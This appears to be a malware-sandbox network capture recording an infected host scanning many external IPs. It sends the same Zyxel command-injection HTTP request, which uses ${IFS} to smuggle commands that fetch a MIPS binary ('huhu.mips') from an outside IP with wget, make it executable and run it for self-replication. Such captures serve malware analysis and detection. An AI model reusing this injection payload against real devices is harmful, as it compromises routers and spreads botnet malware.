                                                  Jan 19, 2024 18:24:13.395968914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8594192.168.2.134751841.190.103.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.396018982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8595192.168.2.1347702185.204.236.73443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.396058083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8596192.168.2.133371218.91.78.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.396090031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8597192.168.2.1351236165.253.218.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.396136045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8598192.168.2.1334170197.97.155.62443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.396167994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8599192.168.2.1346826155.89.250.106443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.396220922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8600192.168.2.1348388216.25.9.233443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.396260023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8601192.168.2.1354320181.122.140.229443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.396320105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8602192.168.2.1338178162.18.190.168443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.396352053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8603192.168.2.1342210139.49.35.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.396394968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8604192.168.2.1345970144.146.254.50443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.396419048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8605192.168.2.1337088221.21.14.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.396481037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8606192.168.2.13364489.201.160.248443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.396531105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8607192.168.2.1345410146.214.75.254443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.396552086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8608192.168.2.1344080113.160.48.142443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.396589041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8609192.168.2.134753434.13.31.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.396646976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8610192.168.2.1354566170.51.214.113443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.396682978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8611192.168.2.1351194219.21.223.168443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.396728039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8612192.168.2.1333384134.18.2.143443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.396775007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8613192.168.2.1356150165.133.119.194443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.396794081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8614192.168.2.1350304123.20.183.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.396847010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8615192.168.2.1337256171.90.204.185443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.396883011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8616192.168.2.1338126222.253.116.244443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.396919012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8617192.168.2.1337650177.122.19.112443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.396965027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8618192.168.2.1337146110.79.255.172443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.397027969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8619192.168.2.1341236201.61.5.162443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.397049904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8620192.168.2.133520047.118.181.25443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.397084951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8621192.168.2.134490236.147.116.214443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.397138119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8622192.168.2.134061854.96.49.50443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.397178888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8623192.168.2.1348578139.100.212.145443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.397237062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8624192.168.2.1348272112.222.23.141443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.397252083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8625192.168.2.1339026156.144.216.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.397306919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8626192.168.2.1337022150.63.231.216443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.397353888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8627192.168.2.1333156121.110.181.78443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.397388935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8628192.168.2.1352240204.52.123.75443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.397437096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8629192.168.2.1343342176.171.127.10443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.397474051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8630192.168.2.1359000150.19.62.252443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.397510052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8631192.168.2.135542850.199.213.202443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.397579908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8632192.168.2.134248084.148.145.53443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.397639036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8633192.168.2.134181257.109.19.118443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.397639036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8634192.168.2.1335562123.192.221.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.397670984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8635192.168.2.134803813.252.247.177443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.397706985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8636192.168.2.133984861.134.236.55443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.397751093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8637192.168.2.13561068.36.128.72443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.397773027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8638192.168.2.135673017.95.64.234443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.397835970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8639192.168.2.1359056205.71.172.172443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.397893906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8640192.168.2.1360536167.159.55.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.397917032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8641192.168.2.1359868138.106.60.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.397958994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8642192.168.2.1358134177.237.154.42443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.398005009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8643192.168.2.1335752149.12.59.22443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.398050070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8644192.168.2.133997449.30.20.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.398096085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8645192.168.2.135069624.74.152.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.398139000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8646192.168.2.133764251.25.138.11443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.398181915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8647192.168.2.135363066.233.254.65443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.398221016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8648192.168.2.1360264204.167.70.100443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.398267984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8649192.168.2.135297051.124.108.160443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.398313999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8650192.168.2.1354012136.210.164.75443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.398350000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8651192.168.2.133636464.39.255.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.398405075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8652192.168.2.1341662107.96.215.253443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.398425102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8653192.168.2.1337732185.238.94.253443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.398468971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8654192.168.2.1347378177.201.17.70443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.398516893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8655192.168.2.1358728211.35.101.115443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.398565054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8656192.168.2.1335340182.23.238.27443
                                                  TimestampBytes transferredDirectionData
